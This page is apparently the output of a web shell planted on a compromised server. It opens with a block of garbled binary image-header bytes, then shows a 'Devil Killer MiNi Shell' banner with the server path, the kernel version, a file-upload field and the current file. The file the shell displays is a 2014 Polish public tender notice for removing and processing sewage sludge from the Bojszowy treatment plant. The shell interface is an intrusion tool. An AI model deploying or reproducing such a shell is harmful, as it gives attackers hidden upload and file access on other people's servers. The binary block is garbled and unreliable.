JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140114/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140114/14294-N-2014.html

<p class="kh_header"><b>Bojszowy: Sukcesywny odbiór, transport i zagospodarowanie osadów ściekowych o kodzie 190805 z oczyszczalni ścieków w Bojszowach</b><br>
<b>Numer ogłoszenia: 14294 - 2014; data zamieszczenia: 14.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminne Przedsiębiorstwo Komunalne Sp. z o.o. , ul. Świętego Jana 52, 43-220 Bojszowy, woj. śląskie, tel. 32 218 91 77, faks 32 218 91 77.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gpkbojszowy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka zo. o.  100% udział Gminy Bojszowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywny odbiór, transport i zagospodarowanie osadów ściekowych o kodzie 190805 z oczyszczalni ścieków w Bojszowach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywny odbiór, transport i zagospodarowanie osadów ściekowych o  kodzie 190805 z oczyszczalni w Bojszowach.
Osady są magazynowane na terenie oczyszczalni ścieków w Bojszowach (woj. śląskie), przy  ul. Gościnnej, pod przeznaczoną do tego celu wiatą. Zamawiający wymaga, aby Wykonawca zapewnił odbiór osadów w sposób sukcesywny, z częstotliwością  i w ilościach zapewniających powierzchnię wystarczającą do bieżącego magazynowania wytwarzanych w sposób ciągły osadów. Częstotliwość odbioru osadów z placu składowego musi być taka, aby nie dopuścić do przepełnienia placu. Nie może być mniejsza niż raz na 1 tydzień, w ilości ok. 15 ton. Wielkość kontenerów na osady musi być tak dobrana, aby możliwy był ich załadunek przez pracowników Zamawiającego, za pomocą środków technicznych, jakie posiada w dyspozycji (przenośnik taśmowy), bezpośrednio z wiaty magazynowej. Do tej pory stosowano kontenery typu KP o pojemności 10 - 18 m3. Osady na terenie oczyszczalni, gromadzone są w workach polipropylenowych o wymiarach 60 cm x 110 cm (odwadniane na workownicy).  Załadunek polega na ich ręcznym otwieraniu i wysypywaniu zawartości na taśmę przenośnika, z którego osady kierowane są bezpośrednio do podstawionego przez Wykonawcę kontenera. Załadunku do podstawionego kontenera  dokonywać będą pracownicy Zamawiającego.  
Z uwagi na ograniczoną powierzchnię manewrowania ciężkimi pojazdami zaleca się odbycie wizji w terenie. Jest ona możliwa w dni robocze, po uzgodnieniu  terminu z kierownikiem ds. ochrony środowiska Ewą Kwolik - tel. 32/2189074 lub 661 939 608. Podczas wizji lokalnej nie będą udzielane jakiekolwiek odpowiedzi na pytania dotyczące SIWZ, jednakże po jej zakończeniu Wykonawca może złożyć zapytania stosownie do form porozumiewania się  określonych w postępowaniu. Powyższe podyktowane jest koniecznością zachowania zasad uczciwej konkurencji. Wykonawca, który zrezygnuje z odbycia wizji lokalnej, nie będzie mógł podczas wykonywania umowy zgłaszać uwag do sposobu jej realizacji, stanu faktycznego i okoliczności związanych z wykonaniem zamówienia, o których mógł się dowiedzieć uczestnicząc w wizji lokalnej. 

 OFERTY CZĘŚCIOWE

Z uwagi na  brak możliwości gromadzenia osadów na terenie oczyszczalni ścieków w Bojszowach przez okres dłuższy niż 2 tygodnie, w szczególności w okresie, kiedy zabronione jest ich stosowanie (uwarunkowania  art.96 ust.12.5  ustawy z dnia  14 grudnia 2012 r. o odpadach [Dz.U. z 2013 r., poz.21]),  zachodzi konieczność ich sukcesywnego wywozu  również w okresie zimowym. 
Dlatego przedmiot zamówienia został podzielony na dwie części:

Część I 
Odbiór, transport  i zagospodarowanie ustabilizowanych komunalnych osadów ściekowych o kodzie 19 08 05 pochodzących z oczyszczalni ścieków w Bojszowach, w miesiącach:   III - XI 2014 r. - w ilości ok. 630 Mg.
Zagospodarowanie osadu w procesie R10:
- do uprawy roślin przeznaczonych do produkcji kompostu,    lub/i
- do uprawy roślin nieprzeznaczonych do spożycia i do produkcji pasz

Część II (z możliwością składania ofert wariantowych):
 Odbiór, transport  i zagospodarowanie ustabilizowanych komunalnych
osadów ściekowych o kodzie 19 08 05 pochodzących z oczyszczalni ścieków w Bojszowach, w miesiącach: XII 2014 r. oraz I i II 2015  r. - w ilości ok. 210 Mg - 
zagospodarowanie osadów w sposób inny, niż stosowanie osadów w celach określonych w art. 96.1 ustawy z dnia  14 grudnia 2012 r. o odpadach [Dz.U. z 2013 r., poz.21]: 
WARIANT 1:  zagospodarowanie osadu w instalacji lub urządzeniu, w których dopuszczone jest przetwarzanie odpadów o kodzie 190805 (zgodnie z wydaną dla tej instalacji decyzją na przetwarzanie odpadów, jeżeli jest wymagana)
WARIANT 2:  inny sposób zagospodarowania osadu, zgodnie z punktem 3.2 SIWZ  OFERTY WARIANTOWE 
 OFERTY   WARIANTOWE

Zamawiający dopuszcza składanie ofert wariantowych tylko dla części  II zamówienia -wykonanie zamówienia w sposób odmienny niż określony przez Zamawiającego, spełniający wymagania określone w przepisach prawa wskazanych w części A-opis przedmiotu zamówienia, punkt III. 1. oraz niniejszym SIWZ (zagospodarowanie osadu w okresie zimowym).

PODSTAWOWE INFORMACJE O UWARUNKOWANIACH  ŚWIADCZENIA USŁUGI  BĘDĄCEJ   PRZEDMIOTEM ZAMÓWIENIA


Szacowana  całkowita ilość osadów do odbioru i zagospodarowania, której dotyczy zamówienie wynosi  ok. 840 Mg ( w tym ok. 630 Mg w części I zamówienia oraz ok.210 Mg w części II  zamówienia). Osad ma konsystencję mazistą, zawartość suchej masy zawiera się w granicach od 10-15% (szczegółowe wyniki analiz osadów stanowią załącznik do SIWZ - zał. 7).  
Zamawiający zastrzega, iż rozliczenie wykonanej usługi nastąpi w oparciu o rzeczywistą ilość odebranych osadów ściekowych, co potwierdzane będzie na kartach przekazania odpadów (KPO), w oparciu o dowody ważenia dostarczane przez  Wykonawcę każdorazowo po wykonaniu odbioru ładunku osadu lub inne ustalenia zaakceptowane przez Wykonawcę jak i Zamawiającego w porozumieniu. KPO wystawiana będzie przez Zamawiającego (wytwórcę odpadów) na koniec każdego miesiąca kalendarzowego, na podstawie dostarczonych przez Wykonawcę kwitów wagowych lub innych dokumentów określających masę osadów, w wystarczającej liczbie egzemplarzy
MIEJSCE ZAGOSPODAROWANIA OSADÓW ŚCIEKOWYCH
Zagospodarowanie komunalnych osadów ściekowych musi nastąpić w obrębie województwa śląskiego ; dopuszcza się zagospodarowanie osadu na terenie województwa innego pod warunkiem, że odległość od miejsca wytwarzania odpadów do instalacji lub miejsca przeznaczonego do odzysku lub unieszkodliwiania jest mniejsza niż odległość do instalacji lub miejsca zagospodarowania osadów, położonego na obszarze województwa śląskiego
SPOSÓB ZAGOSPODAROWANIA ODPADÓW.
Zamawiający dopuszcza zagospodarowanie osadów 190805 w następujący sposób:

a)   W procesie odzysku R-10 (tylko dla części I zamówienia):
do uprawy roślin przeznaczonych do produkcji kompostu, lub/i
do uprawy roślin nieprzeznaczonych do spożycia i do produkcji pasz. 

Zamawiający nie dopuszcza zagospodarowania odpadów w procesie odzysku R-10 dla części II zamówienia.

b) Poprzez poddanie osadów procesom przetwarzania odpadów w instalacji lub urządzeniu (tylko dla części II zamówienia), w których dopuszczone jest przetwarzanie osadów ściekowych o kodzie 190805 (wydano decyzję administracyjną wskazującą na możliwość zagospodarowania  osadów o kodzie 190805 w tej instalacji lub urządzeniu)

c) zagospodarowanie osadów w sposób odmienny niż wskazany przez Zamawiającego, oferowany przez Wykonawcę (tylko dla części II zamówienia) - spełniający wymagania niniejszego SIWZ


Badania gruntów, na których stosowane będą osady ściekowe (dot. części I zamówienia)wykonywane będą na koszt Zamawiającego, przed zastosowaniem na nich osadów ściekowych. 
Badania będą wykonane zgodnie z zakresem określonym w § 6 ust. 1 ww. rozporządzenia, a ich aktualne wyniki  wraz z wyliczoną dawką osadów  przekazywane będą odbiorcy osadu (Wykonawcy) w terminie co najmniej 3 dni przed uzgodnionym terminem wywozu określonej objętości osadu ściekowego z oczyszczalni w Bojszowach.
 Ustalona przez Zamawiającego  dopuszczalna dawka jest dawką nieprzekraczalną.
POZOSTAŁE  WARUNKI  DLA WYKONAWCÓW:
W przypadku, jeżeli ważenie odbieranych osadów na wadze samochodowej (zalegalizowanej) nie będzie możliwe z przyczyn obiektywnych lub uzasadnionych ekonomicznie lub technicznie,  strony (Wykonawca i Zamawiający) ustalają że określenie ilości odbieranych osadów nastąpi  poprzez przeliczenie ilości osadów z ich objętości na masę. Do tego celu ustala się, że 1 m3 osadów waży 1 Mg. 
Odbiór osadu (załadowanego kontenera) z terenu oczyszczalni ścieków możliwy będzie w dni robocze od poniedziałku do piątku w godz. od 6:00 do 22:00, po wcześniejszym umówieniu się stron na odbiór . Dokonanie załadunku przez pracowników Zamawiającego możliwe jest w godzinach od 6.00 do 14.00. Należy wziąć pod uwagę środki techniczne, jakimi dysponuje Zamawiający i sposób dokonywania przez niego załadunku osadu do podstawionego kontenera. 
Wywozy osadu powinny odbywać się niezwłocznie po zawiadomieniu Wykonawcy przez Zamawiającego iż kontener jest załadowany, nie później niż  48 godzin od zgłoszenia. 
Kontenery, przyczepy ciągnikowe oraz samochody transportujące muszą być w dobrym stanie technicznym, dopuszczone do ruchu drogowego, a podstawiane w celu ich załadunku kontenery muszą być czyste (pozbawione resztek odpadów).
Wykonawca musi posiadać stosowne prawem zezwolenia na transport tego rodzaju odpadu
Zamawiający płaci Wykonawcy za każdą tonę wywiezionego osadu zgodnie z warunkami umowy i niniejszego SIWZ.
Wykonawca wystawia Zamawiającemu fakturę VAT za każdy zakończony miesiąc kalendarzowy świadczenia usług oraz potwierdza masę odebranych osadów na karcie przekazania odpadu sporządzoną zgodnie z obowiązującym prawem, przez Zamawiającego.

Termin wykonania zamówienia 

Przedmiot zamówienia realizowany będzie w terminie:
Część I - w miesiącach III - XI 2014 r. (9 miesięcy)
Część II - w miesiącach XII 2014 r., I, II   2015 r. (3 miesiące)
Zamawiający wymaga, aby termin płatności wynosił  30 dni od przedłożenia faktury..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.38.00-4, 90.51.37.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> tak.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.03.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda  wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana wg zasady spełnia/nie spełnia, na podstawie:
1.1 złożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału
w postępowaniu, zgodnie z wzorem jako załącznik Nr 3 do SIWZ (z art.22 ust.1 pkt.1 ustawy PZP)
1.2 Wykonawca musi posiadać uprawnienia do prowadzenie działalności w zakresie
transportu odpadów (z wyszczególnieniem kodu ustabilizowanych komunalnych
osadów ściekowych - dotyczy części I i II, wszystkich wariantów), wydane przez właściwy organ (starosta) ze względu na miejsce siedziby lub zamieszkania posiadacza odpadów w oparciu o przepisy art.28 ustawy z dnia 27.04.2001 r. [Dz,U, z 2010 r. nr 185, poz. 1243, z późn.zm], jeśli zachowują moc prawną ( w powiązaniu z art.233 ustawy z dnia 14.12.2012 r.),  oraz jeśli dotyczy:
1.3 Wykonawca musi posiadać zezwolenie na prowadzenie działalności w zakresie przetwarzania (odzysku lub unieszkodliwiania) odpadów (z wyszczególnieniem kodu 190805
ustabilizowanych komunalnych osadów ściekowych) wydane w oparciu o przepisy
ustawy  o odpadach z dnia 14 grudnia 2012 r. [Dz. U. z 2013 r., poz. 21] przez właściwy organ (wojewoda, starosta) ze względu na miejsce prowadzenia działalności  (dotyczy części II zamówienia w zależności od przyjętego przez Wykonawcę wariantu zagospodarowania odpadów - nie dotyczy procesu R-10), lub w oparciu o przepisy ustawy z dnia 27 kwietnia 2001 r. o odpadach, jeżeli zachowują moc prawną.
1.4 Wykonawca musi złożyć oświadczenie, że grunty na których mają zostać zastosowane osady ściekowe nie są objęte zakazami w myśl art. 96.12 ustawy  o odpadach -
według wzoru jako załącznik Nr 6 do SIWZ (dotyczy części I zamówienia - wariantu zagospodarowania odpadów w procesie  R-10).
1.5  Wykonawca musi wykazać, iż jest władającym powierzchnią ziemi, na której stosowane mają być osady ściekowe zgodnie z definicją zawartą w art.3 pkt.44 ustawy Prawo ochrony środowiska  z dnia 27 kwietnia 2001 r. [Dz.U.  z 2008 r., nr 25 poz. 150 z późn.zm.] -  (dotyczy części I zamówienia - metody R10), która mówi, iż przez władającego powierzchnią ziemi należy rozumieć właściciela nieruchomości, a jeżeli w ewidencji gruntów i budynków prowadzonej na podstawie ustawy -Prawo geodezyjne i kartograficzne ujawniono inny podmiot władający gruntem - podmiot ujawniony jako władający.
Jako podstawę spełnienia warunku załączono pismo IN.III.7021.42.2013.EG WIOŚ w Katowicach (zał. 8 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana wg zasady spełnia/ nie spełnia, na podstawie przedłożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału
w postępowaniu, zgodnie z wzorem jako załącznik Nr 3 do SIWZ (z art.22 ust.1 pkt.2 ustawy PZP) ,a także poświadczeń o należytym wykonaniu usług i wykazu tych usług zgodnie z wzorem - zał.10 do SIWZ;  Wykonawca musi wykazać, że zrealizował w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy, w tym okresie, co najmniej 2 usługi tożsame z zakresem przedmiotu zamówienia, tj. polegającą na transporcie i zagospodarowaniu co najmniej 500 Mg osadów ściekowych 190805 każda, w okresie kolejnych 12 miesięcy każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana wg zasady spełnia/ nie spełnia, na podstawie przedłożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału
w postępowaniu, zgodnie z wzorem jako załącznik Nr 3 do SIWZ (z art.22 ust.1 pkt.3ustawy PZP)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana wg zasady spełnia/ nie spełnia, na podstawie przedłożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału
w postępowaniu, zgodnie z wzorem jako załącznik Nr 3 do SIWZ (z art.22 ust.1 pkt.3 ustawy PZP)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana wg zasady spełnia/ nie spełnia, na podstawie przedłożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału
w postępowaniu, zgodnie z wzorem jako załącznik Nr 3 do SIWZ (z art.22 ust.1 pkt.4 ustawy PZP)oraz przedłożyć opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający iż Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia .  Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie
prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej        100 000 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gpkbojszowy.pl/BIP<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.gpkbojszowy.pl/BIP.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2014 godzina 12:45, miejsce: Siedziba Gminnego Przedsiębiorstwa Komunalnego Sp. z o. o. 
ul. Świętego Jana 52,43-220  Bojszowy
Dział Kadr.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Odbiór, transport  i zagospodarowanie ustabilizowanych komunalnych osadów ściekowych o kodzie 19 08 05 pochodzących z oczyszczalni ścieków w Bojszowach, w miesiącach:   III - XI 2014 r. - w ilości ok. 630 Mg..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zagospodarowanie osadu w procesie R10:
- do uprawy roślin przeznaczonych do produkcji kompostu,    lub/i
- do uprawy roślin nieprzeznaczonych do spożycia i do produkcji pasz
Przewidywana ilość osadu - 630 Mg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.38.00-4, 90.51.37.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Odbiór, transport  i zagospodarowanie ustabilizowanych komunalnych
osadów ściekowych o kodzie 19 08 05 pochodzących z oczyszczalni ścieków w Bojszowach, w miesiącach: XII 2014 r. oraz I i II 2015  r. - w ilości ok. 210 Mg.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zagospodarowanie osadów w sposób inny, niż stosowanie osadów w celach określonych w art. 96.1 ustawy z dnia  14 grudnia 2012 r. o odpadach [Dz.U. z 2013 r., poz.21] (zamawiający nie dopuszcza zagospodarowania osadów w procesie R10 dla II części zamówienia)
WARIANT 1:  zagospodarowanie osadu w instalacji lub urządzeniu, w których dopuszczone jest przetwarzanie odpadów o kodzie 190805 (zgodnie z wydaną dla tej instalacji decyzją na przetwarzanie odpadów, jeżeli jest wymagana)
